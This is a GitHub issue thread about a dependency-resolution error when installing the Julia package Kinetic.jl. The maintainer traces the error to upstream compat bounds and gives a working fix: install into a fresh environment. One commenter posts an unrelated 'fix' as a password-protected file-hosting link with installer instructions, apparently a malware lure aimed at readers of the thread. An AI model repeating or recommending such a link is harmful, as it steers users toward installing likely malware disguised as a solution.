### ISSUE TITLE
Issue installing library

### ISSUE THREAD

**Issue by GalactoCoder** [vavrines/Kinetic.jl#26]
Hello, 

I am trying to install the Kinetic.jl library, however, I am running into the following problem everytime I try to install the package:

(@v1.10) pkg> add Kinetic
   Resolving package versions...
ERROR: Unsatisfiable requirements detected for package Trixi [a7f1ee26]:
 Trixi [a7f1ee26] log:
 ├─possible versions are: 0.1.0-0.8.8 or uninstalled
 ├─restricted to versions * by an explicit requirement, leaving only versions: 0.1.0-0.8.8
 ├─restricted by compatibility requirements with LoopVectorization [bdcacae8] to versions: [0.1.0-0.2.1, 0.3.3-0.8.8] or uninstalled, leaving only versions: [0.1.0-0.2.1, 0.3.3-0.8.8]...

Has this been seen before? What is the solution?

Thanks for the help!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by vavrines** [comment]
Thanks for reporting this. I can reproduce the issue.
I guess the error comes from the upstream.
The [compat] of OptimizationFlux (among others) seems a bit too aggressive for now, see https://github.com/SciML/Optimization.jl/blob/6ecd588cb41955ebea34107bfab047f3ed73a5ce/lib/OptimizationFlux/Project.toml#L18
A quick solution is to create a new env and only install Kinetic related packages.

**Comment by vavrines** [comment]
Bash
```bash
$ mkdir newenv
$ cd newenv
$ julia
$ ]
```
Julia pkg mode
```julia
(@v1.10) pkg> activate .
  Activating project at `~/newenv`

(newenv) pkg> add Kinetic
```
